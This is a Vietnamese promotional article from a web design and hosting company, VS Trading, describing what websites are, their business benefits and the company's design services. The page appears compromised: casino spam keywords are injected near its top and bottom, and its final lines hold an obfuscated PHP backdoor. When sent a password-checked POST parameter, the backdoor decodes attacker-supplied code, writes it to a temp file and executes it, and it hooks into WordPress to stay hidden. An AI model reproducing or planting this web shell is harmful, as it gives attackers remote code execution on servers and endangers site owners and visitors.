Thiết kế Web - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Thiết kế Web

Ngày 16/06/2013 đăng bởi seo3.VS [email protected]

Website còn gọi là trang web, trang mạng, World Wide Web hay gọi tắt là Web hoặc WWW là một tập hợp trang web bao gồm văn bản, hình ảnh, video, flast,vv…, thường chỉ nằm trong một tên miền chính ( doman name ) hoặc tên miền phụ ( sub domain) hoạt động trên Internet. Một trang web là tập tin HTML hoặc XHTML có thể truy nhập dùng giao thức HTTP. Website có thể được xây dựng từ các tệp tin HTML (website tĩnh) hoặc vận hành bằng các CMS chạy trên máy chủ (website động).

Website có thể được xây dựng bằng nhiều ngôn ngữ lập trình khác nhau (PHP,.NET, Java, Ruby on Rails…) hoặc sử dụng các thư viện mã nguồn mở đã được phát triển sẵn ( WordPress, Joomla, NukeViet, vBulletin, phpBB, Discuz, Opencart, OS Commerce, Other scripts )

Các trang web được lưu trữ ( web hosting ) trên máy chủ web ( server web )  có thể truy cập thông qua Internet.

Website là gì ?

–  Là “show-room” trên Internet – nơi trưng bày và giới thiệu thông tin, hình ảnh, sản phẩm, dịch vụ của cá nhân, tổ chức, doanh nghiệp cho mọi người trên toàn thế giới truy cập bất kỳ thời điểm nào

– Là nơi mua bán, gặp gỡ giữa doanh nghiệp và ngừơi tiêu dùng. Qua đó doanh nghiệp có thể giúp đỡ, tư vấn và thăm dò thị hiếu khách hàng

– Là nơi trao đổi thông tin giữa doanh nghiệp với doanh nghiệp, giữa doanh nghiệp với các tổ chức và chính phủ

– Là văn phòng làm việc, là nơi bán hàng mà không cần mặt bằng, không cần tiện nghi

– Là nơi lấy đơn đặt hàng, lấy đơn đăng ký của khách hàng

– Là nơi để bạn cạp nhật các thông tin hàng ngày và giải trí trực tuyến

Lợi ích khi có website ?

– Thông tin dễ dàng cập nhật, thay đổi, khách hàng có thể xem thông tin ngay tức khắc, ở bất kỳ nơi nào

– Tiết kiệm chi phí in ấn, gửi bưu điện, fax, thông tin không giới hạn (muốn đăng bao nhiêu thông tin cũng được, không giới hạn số trang, diện tích bảng in…) và không giới hạn phạm vi khu vực (toàn thế giới có thể truy cập)

– Thông tin hình ảnh được thể hiện một cách sống động, linh họat làm cho việc giới thiệu trở nên ấn tượng

– Rất dễ để người khác nhớ đến, bởi vì chỉ với 1 tên trang web nó chứa tất cả những gì bạn muốn giới thiệu, ví dụ thegioididong.com, khi cần ngừơi ta sẽ nhớ đến tên web và tìm đến doanh nghiệp

– Chỉ với 1 địa chỉ trang web, khách hàng sẽ giữ được liên lạc với doanh nghiệp, cho dù doanh nghiệp có thay đổi địa điểm, số điện thọai thì khách hàng vẫn tìm lại đựơc nhờ trang web, vậy có thể nói trang web là “danh thiếp”

Website sẽ mang đến cho bạn rất nhiều lợi ích mà bạn không thể lường trước được, một trong số nhiều lợi ích mà bạn có thể thấy được ngay khi có một trang website riêng đó là:

1. Cung cấp thông tin nhanh chóng, mang tính cập nhật để phục vụ tốt các đối tượng khách hàng

2. Khối lượng thông tin cung cấp không hạn chế như quảng cáo trên báo, đài, truyền hình

3. Quảng bá ở thị trường toàn cầu (báo chí Việt nam không giúp được điều này)

4. Thông tin luôn sẵn có trên website và có thể được xem bất kỳ lúc nào, tìm kiếm dễ dàng

5. Tiết kiệm chi phí quảng cáo (giá xây dựng và duy trì một website rẻ hơn nhiều so với chi phí quảng cáo trên báo, đài, truyền hình mà nội dung lại không bị giới hạn)

6. Tiết kiệm chi phí thuê mặt bằng (siêu thị điện tử), nhân sự (nhân viên phục vụ)

7. Thông tin dễ dàng được thay đổi mà không phải in lại như brochure, catalogue, danh thiếp…

8. Tương tác với đối tượng khách hàng (hỗ trợ, tư vấn, đặt hàng…)

9. Làm tăng tính chuyên nghiệp của doanh nghiệp (thời đại kỹ thuật số mà trên danh thiếp của Ddoanh nghiệp không có địa chỉ website thì khách hàng của bạn sẽ nghĩ chắc là doanh nghiệp nhỏ)

10. Rút ngắn khoảng cách giữa doanh nghiệp nhỏ và doanh nghiệp lớn (trên website, nếu làm chuyên nghiệp, thì không ai biết đây là doanh nghiệp lớn hay nhỏ vì thương mại điện tử có tính chất “không biết mặt nhau, không thăm viếng thực sự”)

11. Và quan trọng nhất, Website cũng chính là Doanh nghiệp của bạn trên thị trường kinh doanh Thương Mại Điện Tử.

Ngoài ra còn tùy từng lĩnh vực kinh doanh của từng doanh nghiệp mà website mang lại những lợi ích khác nhau. Dưới đây là một vài lợi ích chung quan trọng:

– Cơ hội quảng bá không giới hạn, công việc kinh doanh mở cửa 24h/1ngày: website của bạn chính là một văn phòng giao dịch kinh doanh toàn cầu luôn mở cửa 24h/1 ngày, 7 ngày/1 tuần và 365 ngày/1 năm. Bất kỳ ai, dù ở đâu đều có thể ghé thăm văn phòng của Bạn.  Với các công cụ tìm kiếm và hạ tầng Internet phát triển như hiện nay, khách hàng có thể truy cập thông tin về doanh nghiệp hoặc tổ chức của bạn bất cứ lúc nào và từ bất cứ nơi đâu, với một chiếc máy tính, các thiết bị cầm tay có kết nối internet.

– Tiết kiệm và tối ưu: Hãy tưởng tượng, thay vì phải gửi Catalog bằng giấy hoặc đĩa CD cho khách hàng, bạn có thể mời khách hàng đến thăm website của mình với những thông tin còn cặn kẽ và đầy đủ hơn ở Catalog. Bạn chẳng phải trả lương cho ai cả, mọi thứ ở văn phòng giao dịch toàn cầu của bạn đều được thực hiện một cách chính xác và hoàn toàn tự động. Chi phí để có được một website thật là quá nhỏ bé so với núi chi phí mà bạn bỏ ra để quảng bá các hoạt động của Bạn bằng những phương tiện truyền thống.

– Đồng hành và vượt lên trên các đối thủ cạnh tranh trong một môi trường kinh doanh năng động: Với việc có một website, bạn đã sẵn sàng song hành cùng các đối thủ cạnh tranh chinh phục các cơ hội trong nền kinh tế Internet. Nếu website của bạn được điều hành và phát triển dựa trên các giải pháp và công nghệ do VS Trading cung cấp, thì chúng tôi có thể đảm bảo rằng bạn sẽ vượt lên trên các đối thủ cạnh tranh là một mục tiêu hoàn toàn thực tiễn.

– Có thêm hàng ngàn khách hàng mới, làm thỏa mãn cả những khách hàng khó tính nhất: Với môi trường internet năng động, bạn dễ dàng thay đổi và cập nhật thông tin lên website của mình để sẵn sàng làm thoả mãn yêu cầu của các khách hàng khó tính nhất. Và tất nhiên, nỗ lực cung cấp các thông tin chất lượng cao của bạn sẽ mang lại kết quả là bạn sẽ có thêm vô số các khách hàng tiềm năng và hàng ngàn khách hàng sử dụng sản phẩm và dịch vụ của bạn.

– Tạo ra được hình ảnh về một doanh nghiệp được tổ chức khoa học và hiệu quả: Với việc tổ chức các thông tin trên website của mình hướng tới lợi ích của khách hàng thì khách hàng sẽ dễ dàng khai thác các thông tin trên website của bạn. Và khi khách hàng hài lòng thì bạn đã xây dựng được hình ảnh tốt đẹp về mình trong tâm trí và tình cảm của khách hàng.

– Phương tiện tốt nhất để Bạn tiếp thị sản phẩm, dịch vụ và hình ảnh của mình theo một hình thức mới: Thật vậy, với các công nghệ và kỹ thuật hiện đại hiện nay thì bạn hoàn toàn có thể tin tưởng rằng website chắn chắn là là một phương tiện truyền thông tốt nhất để Bạn có thể thực hiện ý đồ của mình trong việc quảng bá và tiếp thị một cách sinh động và hiệu quả nhất mà một phương tiện đơn lẻ khác không thể đáp ứng được.

Thiết kế web là gì?

Thiết kế web là hoạt động trải rộng từ khâu thu thập ý tưởng, yêu cầu của khách hàng tới việc dựng đề án, bản thảo, tiến hành thiết kế giao diện đồ hoạ, tổ chức thực hiện thiết lập, xây dựng cơ sở dữ liệu, lập trình các tính năng cho trang web và cuối cùng, đưa trang web vào chạy thử nghiệm, chỉnh sửa và đưa lên hoạt động chính thức. Giai đoạn tiếp sau khi trang web đã đi vào hoạt động là giai đoạn bảo hành, nâng cấp và cập nhật dữ liệu cho toàn bộ hệ thống web.

Các bước căn bản có thể được tóm tắt như sau:

– Thu thập ý tưởng, yêu cầu từ khách hàng về sản phẩm

– Dựng đề án và mô hình phác thảo

– Tổ chức thực hiện xây dựng sản phẩm (bao gồm thiết kế đồ hoạ, xây dựng cơ sở dữ liệu, và lập trình web)

– Tiến hành chạy thử nghiệm, chỉnh sửa và hoàn thiện sản phẩm

– Đưa trang web lên online, chạy chính thức. Bảo hành sản phẩm (sửa lỗi, nâng cấp, và cập nhật dữ liệu)

Dịch vụ thiết kế Website

Không đơn giản là viết lên một vài tập tin hay dòng lệnh trên internet. Thiết kế website còn làm cho hình ảnh doanh nghiệp, một cá nhân hay thậm chí là một quốc gia trên xa lộ thông tin toàn cầu đẹp lên hay xấu đi. Việc thiết kế website không khó. Việc Thiết kế website chạy được cũng không khó. Khó là ở chỗ, làm sao Thiết kế ra một website – dù đơn giản hay phức tạp – dù cho đồ sộ quy mô hay chỉ là một trang Web nhỏ vẫn mang lại giá trị đích thực cho người sở hữu nó..

Đây là điều vô cùng khó khăn vì hầu hết website hiện tại chỉ làm được mỗi một nhiệm vụ: Thông báo cho mọi người biết sự tồn tại của chủ nhân nó. Website là một phương tiện quảng cáo hiệu quả hơn bất kỳ một phương tiện nào khác, có thể truyền tải tất cả những gì bạn muốn gửi đến khách hàng, bất chấp khoảng cách về không gian và thời gian, không cần Catalogue, Brochure, hay một phương tiện quảng cáo nào khác…

Internet ngày nay được sử dụng như một phương tiện quảng bá đại chúng trong mọi lĩnh vực, đặc biệt là lĩnh vực kinh doanh. Để hòa mình chung vào nền kinh tế thế giới, không gì hơn là nên có một website riêng. Website là một phương tiện quảng cáo hiệu quả hơn bất kỳ một phương tiện nào khác, có thể truyền tải tất cả những gì bạn muốn gửi đến khách hàng, bất chấp khoảng cách về không gian và thời gian, không cần Catalogue, Brochure, hay một phương tiện quảng cáo nào khác.

Chỉ cần 30 giây truy cập vào Website, người xem có thể tìm hiểu tất cả những lĩnh vực hoạt động kinh doanh, những sự kiện, cũng như mọi tiềm năng mà doanh nghiệp bạn thực có… Và như thế vấn đề thiết kế website đã trở thành tất yếu. Do vậy website của Doanh nghiệp bạn phải có những tính năng ưu việt so với các đối thủ cạnh tranh.

VS Trading là công ty chuyên cung cấp các giải pháp phần mềm và thiết kế website chuyên nghiệp.Với công nghệ hiện đại và nguồn nhân lực có trình độ cao, VS Trading mang đến cho doanh nghiệp các giải pháp hiệu quả trong việc:

– Xây dựng và thiết kế website chuyên nghiệp, giao diện phù hợp và hệ quản trị CMS dễ dàng, thân thiện với người dùng

– Đáp ứng các yêu cầu tối ưu về bảo mật

– Đáp ứng các yêu cầu tối ưu tìm kiếm, nội dung, hỗ trợ tốt nhất về SEO

– Cấu hình, khắc phục các sự cố của website

– Nâng cấp tính năng hệ thống một cách toàn diện

– Bảo trì, hỗ trợ phát triển giải pháp website trong suốt quá trình vận hành hệ thống website

Giải pháp xây dựng, thiết kế website cho mọi cá nhân và tổ chức, doanh nghiệp của VS Trading. là một giải pháp tổng thể bao gồm nhiều công đoạn cấu thành: Từ lên kế hoạch xây dựng, khảo sát thị trường, tìm đúng đối tượng khách hàng mục tiêu đến thiết kế mỹ thuật, xây dựng hạ tầng kỹ thuật, thiết lập hệ thống bảo mật và rất nhiều công đoạn nhỏ nhưng quan trọng khác. Như vậy, website mới có thể trở thành một phần tất yếu và cực kỳ quan trọng trong chiến lược kinh doanh tiếp thị của doanh nghiệp hay mỗi cá nhân.

Với công nghệ web mới nhất hiện nay, VS Trading sẵn sàng cung cấp cho khách hàng của mình các giải pháp thiết kế website sau:

– Giải pháp Thiết kế website Công ty: Đơn giản là một profile giới thiệu về doanh nghiệp hoạt động trực tuyến trên Internet.

– Giải pháp Thiết kế website e-Catalogue: Website giống như một bộ catalogue trực tuyến của doanh nghiệp.

– Giải pháp Thiết kế website thương mại điện tử: Một website bán hàng trực tuyến với đầy đủ tính năng: Giới thiệu sản phẩm, dịch vụ, giỏ hàng, chức năng gửi nhận đơn hàng, tính cước vận chuyển, chiết khấu, khuyến mãi và cả thanh toán online.

– Giải pháp Thiết kế website giáo dục, đào tạo: Đáp ứng yêu cầu của một trường học trực tuyến với các tính năng: Giảng bài, thu âm, luyện thi, thi thử, thi trắc nghiệm, gallery, thông tin học sinh, phụ huynh,…

– Giải pháp Thiết kế website nhà đất, rao vặt, đấu giá: Đầy đủ tính năng: Mua, bán, đấu giá, quản lý thành viên (theo cấp độ và mức phí), tin Vip, tin Reseller (trả tiền trước, trừ tiền sau).

– Giải pháp xây dựng sàn giao dịch bất động sản, cổng thông tin – Portal cho các tổ chức và doanh nghiệp, báo điện tử

– Giải pháp Thiết kế website dịch vụ: Đáp ứng yêu cầu các dịch vụ: Giao nhận hàng hóa, dịch vụ môi giới, bảo hiểm,…

– Giải pháp Thiết kế website Tin tức: Đáp ứng yêu cầu khó nhất về một portal chuyên về tin tức như một tờ báo online: Phân quyền cho Tổng Biên tập, Biên tập, các biên tập viên, các phóng viên và các nhân viên nhập liệu,… Website tin tức còn dễ dàng quản lý các module, các hệ thống quảng cáo, backup cơ sở dữ liệu,…

– Thiết kế các website cá nhân và thiết kế các web site dạng khác,…

Cho dù bạn chọn cho mình giải pháp nào, nếu đã đăng ký dịch vụ Thiết kế website tại VS Trading, bạn đều có thể dễ dàng quản lý website của mình mà không cần biết về mã HTML, về CSS, về cơ sở dữ liệu, về ngôn ngữ lập trình. Điều bạn cần làm chỉ là: Click, Kéo, Thả và biết nhập liệu như làm với chương trình soạn thảo văn bản Word là được.

Liên hệ ngay với chúng tôi để được tư vấn và trải nghiệm các dịch vụ tốt nhất !

CÔNG TY TNHH THƯƠNG MẠI MÁY CHỦ VIỆT NAM

Trụ sở: Số 07 ngõ 43 phố Nguyễn Thị Định, Phường Trung Hoà, Quận Cầu Giấy, Thành phố Hà Nội, Việt Nam

HCM: Phòng 13.09, Lô C, Số 974A Trường Sa (Co.opmart Nhiêu Lộc), Phường 12, Quận 3, Hồ Chí Minh.

Tel: 0247303406802873038068

Email: [email protected]

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}